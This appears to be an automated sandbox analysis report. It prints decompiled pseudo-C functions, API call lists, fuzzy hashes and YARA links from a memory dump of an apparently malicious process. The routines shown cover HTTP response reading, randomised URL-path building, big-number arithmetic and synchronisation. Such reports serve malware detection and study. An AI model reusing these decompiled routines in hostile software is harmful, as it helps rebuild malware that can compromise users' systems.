Instruction ID: cb96a0d8c3627fa094ee55fa0ceeaf180b4013eb7884c0130d82eb4448ef2880
Opcode Fuzzy Hash: 8965cfd32f6c3ad49abaebd07fb8ce472e86eb8bb1de8beb1bbb7fd946518c11
Instruction Fuzzy Hash: 00514B75D00519EFCF00DFE8C888DAEB7B9EF88705B148599E905EB294D732AD45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04E953C6, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E04E953C6(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E04E91AD1(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E04E950FF(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E04E95745(_t101,  &_v236, _a8, _t96 - _t81);
					E04E95745(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E04E950FF(_t101, 0x4e9d1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E04E950FF(_a16, _a4);
						E04E95088(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L04E9AF2E();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L04E9AF28();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E04E95F21(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E04E990C2(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E04E96044(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x4e9d1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x04e953c9
0x04e953d5
0x04e953db
0x04e953e0
0x04e953e4
0x04e95541
0x04e95545
0x04e95545
0x04e953ea
0x04e953ee
0x04e953f2
0x04e953f5
0x04e95400
0x04e95406
0x04e9540b
0x04e9540e
0x04e95428
0x04e95434
0x04e9543d
0x04e95447
0x04e9544c
0x04e9544e
0x04e95451
0x04e954ff
0x04e95505
0x04e95516
0x04e95529
0x04e95539
0x00000000
0x04e9553e
0x04e9545a
0x04e95461
0x04e95465
0x04e9546b
0x04e9546d
0x04e9546f
0x04e95471
0x04e95473
0x04e9547d
0x04e95482
0x04e95484
0x04e95486
0x04e95487
0x04e95488
0x04e95489
0x04e95490
0x04e95497
0x04e9549a
0x04e9549a
0x04e95467
0x04e95467
0x04e95467
0x04e954a2
0x04e954aa
0x04e954b3
0x04e954b8
0x04e954b8
0x04e954bd
0x00000000
0x00000000
0x04e954bf
0x04e954c2
0x04e954cc
0x00000000
0x00000000
0x04e954ce
0x04e954ce
0x04e954d8
0x04e954b8
0x04e954bd
0x00000000
0x00000000
0x00000000
0x04e954bd
0x04e954e2
0x04e954e5
0x04e954e8
0x04e954ef
0x04e954ef
0x04e954fc
0x00000000
0x04e954fc
0x04e953f7
0x04e953fb
0x04e953fc
0x04e953fe
0x00000000
0x00000000
0x00000000
0x04e953fe
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 04E95473
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04E95489
memset.NTDLL ref: 04E95529
memset.NTDLL ref: 04E95539

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 5842066a1269e5d39e09df23a5650927f14d5f7550951b2d60c4619f182b499c
Instruction ID: 1fe88058e345b7fd87d3f179d21450d8d51069702b1e8a3a9fb374ce72443245
Opcode Fuzzy Hash: 5842066a1269e5d39e09df23a5650927f14d5f7550951b2d60c4619f182b499c
Instruction Fuzzy Hash: 1E417272600219BBEF119FA8CC40BEE77B5EF44714F109529B91AA72C0EB70BD558B90

Uniqueness

Uniqueness Score: -1.00%

Function 04E9A81C, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000008,73B74D40), ref: 04E9A82E

Part of subcall function 04E9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04E95595), ref: 04E9A72B

ResetEvent.KERNEL32(?), ref: 04E9A8A2
GetLastError.KERNEL32 ref: 04E9A8C5
GetLastError.KERNEL32 ref: 04E9A970

Part of subcall function 04E9A734: RtlFreeHeap.NTDLL(00000000,00000000,04E95637,00000000,?,?,00000000), ref: 04E9A740

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
String ID:
API String ID: 943265810-0
Opcode ID: 94c964347e5083751424138ff8a62ff15346176685328dc9cc9d2581ef48081a
Instruction ID: 066d1249b163f97b1980eb643d2e97918d02aee6d3829c19414eb6b16fbbb145
Opcode Fuzzy Hash: 94c964347e5083751424138ff8a62ff15346176685328dc9cc9d2581ef48081a
Instruction Fuzzy Hash: 2C414C72500244BBDF31AFA2DC48EAB7AFDEF85705B10492AF542921D4EA35AD45CA20

Uniqueness

Uniqueness Score: -1.00%

Function 04E915FF, Relevance: 6.1, APIs: 4, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E04E915FF(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				void* _t30;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					_push( &_v8);
					_push(4);
					_push( &_v20);
					_push( *((intOrPtr*)(_t69 + 0x18)));
					if( *0x4e9d134() != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x4e9d164(0, 1,  &_v12);
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E04E9A71F(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_push( &_v8);
										_push(0x1000);
										_push(_v16);
										_push( *((intOrPtr*)(_t69 + 0x18)));
										if( *0x4e9d134() != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E04E95646( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E04E9A734(_v16);
										if(_t64 == 0) {
											_t64 = E04E970CC(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E04E95646( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E04E99242(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}

0x04e915ff
0x04e91600
0x04e91606
0x04e91611
0x04e91611
0x04e91613
0x04e918e7
0x04e918ec
0x04e918ee
0x04e918f3
0x04e918f4
0x04e918f9
0x04e918fa
0x04e91905
0x04e91936
0x04e9193b
0x04e919fe
0x04e91941
0x04e91948
0x04e91950
0x04e919fb
0x04e91956
0x04e9195b
0x04e91960
0x04e91965
0x04e919ed
0x04e9196b
0x04e9196b
0x04e9196d
0x04e91973
0x04e91974
0x04e91974
0x04e91977
0x04e9197a
0x04e91980
0x04e91985
0x04e91986
0x04e9198b
0x04e9198e
0x04e91999
0x00000000
0x00000000
0x04e919a1
0x04e919a9
0x04e919b5
0x04e919b9
0x04e919bb
0x04e919c0
0x00000000
0x00000000
0x04e919c0
0x04e919b9
0x04e919d2
0x04e919d5
0x04e919dc
0x04e919e7
0x04e919e7
0x00000000
0x04e919c2
0x04e919c2
0x04e919c7
0x04e919c9
0x04e919ca
0x04e919cd
0x00000000
0x04e919cd
0x00000000
0x04e919c7
0x04e91974
0x04e919ee
0x04e919ee
0x04e919f4
0x04e919f4
0x04e91950
0x04e91907
0x04e9190d
0x04e91915
0x04e9192e
0x04e91930
0x00000000
0x00000000
0x04e91917
0x04e91921
0x04e91925
0x04e9192b
0x00000000
0x04e9192b
0x04e91925
0x04e91915
0x04e91a07
0x04e91608
0x04e91608
0x04e9160f
0x04e9161a
0x00000000
0x00000000
0x00000000
0x04e9160f

APIs

ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,73BB81D0), ref: 04E918EE
GetLastError.KERNEL32(?,?,?,00000000,73BB81D0), ref: 04E91907
ResetEvent.KERNEL32(?), ref: 04E91980
GetLastError.KERNEL32 ref: 04E9199B

Part of subcall function 04E99242: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,73BB81D0), ref: 04E99259
Part of subcall function 04E99242: SetEvent.KERNEL32(?), ref: 04E99269

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$ErrorLastReset$ObjectSingleWait
String ID:
API String ID: 1123145548-0
Opcode ID: d952aec6fd4b2c4b90aa904ef8716745f896b4f2c29e211f50366c1089d7a92c
Instruction ID: d85a92a4e42fd822b6c8e6b2c3471c3063a0326b56f3774e47522aa80726eaf5
Opcode Fuzzy Hash: d952aec6fd4b2c4b90aa904ef8716745f896b4f2c29e211f50366c1089d7a92c
Instruction Fuzzy Hash: 0341E336600605ABEF229FA6DC44AAEF7F9EF84369F10152DE542D31D4EA30FD418B10

Uniqueness

Uniqueness Score: -1.00%

Function 04E99242, Relevance: 6.1, APIs: 4, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E04E99242(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0x4e9d13c; // 0x4e9abf1
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E04E9A71F(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E04E9A734(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E04E95646( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}

0x04e99242
0x04e99242
0x04e9924c
0x04e99252
0x04e99255
0x04e99259
0x04e9925f
0x04e99264
0x04e9927d
0x04e99280
0x04e99284
0x04e99288
0x04e99289
0x04e9928e
0x04e99291
0x04e99298
0x04e9929f
0x04e992f2
0x04e992f8
0x04e992fe
0x04e99339
0x04e9933f
0x00000000
0x00000000
0x00000000
0x04e992fe
0x04e992a5
0x00000000
0x04e992ac
0x04e992ba
0x04e992bd
0x04e992c0
0x04e992cc
0x04e992d0
0x04e99332
0x04e992d2
0x04e992d5
0x04e992d9
0x04e992da
0x04e992db
0x04e992dd
0x04e992e4
0x04e99322
0x04e9932d
0x04e992e6
0x04e992e9
0x04e992ed
0x04e992ed
0x04e992e4
0x00000000
0x04e992d0
0x04e992a5
0x04e99269
0x04e9926f
0x04e99272
0x04e99277
0x00000000
0x00000000
0x00000000
0x04e99307
0x04e9930f
0x04e99314
0x04e99317
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,73BB81D0), ref: 04E99259
SetEvent.KERNEL32(?), ref: 04E99269
GetLastError.KERNEL32 ref: 04E992F2

Part of subcall function 04E95646: WaitForMultipleObjects.KERNEL32(00000002,04E9A8E3,00000000,04E9A8E3,?,?,?,04E9A8E3,0000EA60), ref: 04E95661

Part of subcall function 04E9A734: RtlFreeHeap.NTDLL(00000000,00000000,04E95637,00000000,?,?,00000000), ref: 04E9A740

GetLastError.KERNEL32(00000000), ref: 04E99327

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID:
API String ID: 602384898-0
Opcode ID: b2322effcbc438ef0fde6c46334ba4a8c30b46ec1e20e61518cf52e21d2f42ef
Instruction ID: a75ea3900a63042c498a8227140b09073bd8fe4554a04a2cc0f4f0c940f78f58
Opcode Fuzzy Hash: b2322effcbc438ef0fde6c46334ba4a8c30b46ec1e20e61518cf52e21d2f42ef
Instruction Fuzzy Hash: 80310CB5900309EFDF21EFA5D8849AEBBF8EF08305F50596EE542E2291D734AE449F50

Uniqueness

Uniqueness Score: -1.00%

Function 04E917E5, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E04E917E5(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x4e9d238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x4e9d250; // 0x572c8678
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x4e9d250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x04e917ed
0x04e917f0
0x04e917f6
0x04e9180e
0x04e91810
0x04e91815
0x04e91817
0x04e9181a
0x04e9181c
0x04e9181f
0x04e91821
0x04e91821
0x04e91823
0x04e9182e
0x04e91833
0x04e91844
0x04e9184c
0x04e91851
0x04e91854
0x04e91857
0x04e91859
0x04e9185c
0x04e9185f
0x04e9185f
0x04e91862
0x04e9186d
0x04e91872
0x04e9187c

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04E91C49,00000000,?,?,04E920C2,?,058495B0), ref: 04E917F0
RtlAllocateHeap.NTDLL(00000000,?), ref: 04E91808
memcpy.NTDLL(00000000,?,-00000008,?,?,?,04E91C49,00000000,?,?,04E920C2,?,058495B0), ref: 04E9184C
memcpy.NTDLL(00000001,?,00000001), ref: 04E9186D

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 670c5c8671689455c428d5e244ddb26521d8b2f01bb6004d8243b6c03b8fb3c5
Instruction ID: 82e5342cba749c2162774b0af2241be70f7f97697efef818a53e8186ac317348
Opcode Fuzzy Hash: 670c5c8671689455c428d5e244ddb26521d8b2f01bb6004d8243b6c03b8fb3c5
Instruction Fuzzy Hash: E3110672A00215BFE7148B6ADC84E9EBBEADB80261B150176F5049B180EB749E00D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 04E96840, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04E96840(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}

0x04e9684a
0x04e9684e
0x04e96863
0x04e96865
0x04e9686a
0x04e96870
0x04e96872
0x04e96877
0x04e96882
0x04e96879
0x04e96879
0x04e96879
0x04e96877
0x04e96890

APIs

memset.NTDLL ref: 04E9684E
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,73BB81D0), ref: 04E96863
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04E96870
CloseHandle.KERNEL32(?), ref: 04E96882

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: 7160643cd239fb6af4bea583f16147b1d1f1963040ebf1545a72e8569024fa3e
Instruction ID: 290a06549a70b4165b039be03c88c4ef60d38738c743509a0ba3826412b7c406
Opcode Fuzzy Hash: 7160643cd239fb6af4bea583f16147b1d1f1963040ebf1545a72e8569024fa3e
Instruction Fuzzy Hash: 70F05EF11043087FD7206F36DCC4C27BBECEB9129DB115A2EF14282151D676AC098A60

Uniqueness

Uniqueness Score: -1.00%

Function 04E923F4, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E04E923F4(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x4e9d32c; // 0x58495b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x4e9d32c; // 0x58495b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x4e9d030) {
					HeapFree( *0x4e9d238, 0, _t8);
				}
				_t14[1] = E04E9486F(_v0, _t14);
				_t11 =  *0x4e9d32c; // 0x58495b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}

0x04e923f4
0x04e923f4
0x04e923fd
0x04e9240d
0x04e9240d
0x04e92412
0x04e92417
0x00000000
0x00000000
0x04e92407
0x04e92407
0x04e92419
0x04e9241d
0x04e9242f
0x04e9242f
0x04e9243f
0x04e92442
0x04e92447
0x04e9244b
0x04e92451

APIs

RtlEnterCriticalSection.NTDLL(05849570), ref: 04E923FD
Sleep.KERNEL32(0000000A,?,04E95D25), ref: 04E92407
HeapFree.KERNEL32(00000000,00000000,?,04E95D25), ref: 04E9242F
RtlLeaveCriticalSection.NTDLL(05849570), ref: 04E9244B

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: d1e488b78f89ca0fcd80fadc3e2427dafb4d24d9ce968fb88c19dcb9a25df7d9
Instruction ID: ea9ca7b6113360ff51312b3bc0f219bfa214396a81dae77320bb51fecf4cca60
Opcode Fuzzy Hash: d1e488b78f89ca0fcd80fadc3e2427dafb4d24d9ce968fb88c19dcb9a25df7d9
Instruction Fuzzy Hash: C5F0DA70600150ABEB10EF7AED49F1577E4EB18746B149446FA41D62D8CB28EC41CB25

Uniqueness

Uniqueness Score: -1.00%

Function 04E91B42, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04E91B42() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x4e9d26c; // 0x2c4
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x4e9d2bc; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x4e9d26c; // 0x2c4
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x4e9d238; // 0x5450000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x04e91b42
0x04e91b49
0x04e91b93
0x04e91b95
0x04e91b95
0x04e91b4d
0x04e91b53
0x04e91b58
0x04e91b5c
0x04e91b62
0x04e91b69
0x00000000
0x00000000
0x04e91b6b
0x04e91b70
0x00000000
0x00000000
0x00000000
0x04e91b70
0x04e91b72
0x04e91b7a
0x04e91b7d
0x04e91b7d
0x04e91b83
0x04e91b8a
0x04e91b8d
0x04e91b8d
0x00000000

APIs

SetEvent.KERNEL32(000002C4,00000001,04E94F0E), ref: 04E91B4D
SleepEx.KERNEL32(00000064,00000001), ref: 04E91B5C
CloseHandle.KERNEL32(000002C4), ref: 04E91B7D
HeapDestroy.KERNEL32(05450000), ref: 04E91B8D

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: a0539a9f038e4cbd81ed4a85c40b19cce0d86e5352766be2502f9dbeca10f3bb
Instruction ID: 5f30097ef47da1898528e88157a087b1b01b812e925b18d91d8764065f58eb81
Opcode Fuzzy Hash: a0539a9f038e4cbd81ed4a85c40b19cce0d86e5352766be2502f9dbeca10f3bb
Instruction Fuzzy Hash: 10F01C71B01322E7FB106A37ED48E567BD9EB04B66B180212B804D72C8FF38EC409660

Uniqueness

Uniqueness Score: -1.00%

Function 04E96702, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E04E96702() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x4e9d32c; // 0x58495b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x4e9d32c; // 0x58495b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x4e9d32c; // 0x58495b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x4e9e81a) {
					HeapFree( *0x4e9d238, 0, _t10);
					_t7 =  *0x4e9d32c; // 0x58495b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x04e96702
0x04e9670b
0x04e9671b
0x04e9671b
0x04e96720
0x04e96725
0x00000000
0x00000000
0x04e96715
0x04e96715
0x04e96727
0x04e9672c
0x04e96730
0x04e96743
0x04e96749
0x04e96749
0x04e96752
0x04e96754
0x04e96758
0x04e9675e

APIs

RtlEnterCriticalSection.NTDLL(05849570), ref: 04E9670B
Sleep.KERNEL32(0000000A,?,04E95D25), ref: 04E96715
HeapFree.KERNEL32(00000000,?,?,04E95D25), ref: 04E96743
RtlLeaveCriticalSection.NTDLL(05849570), ref: 04E96758

Memory Dump Source

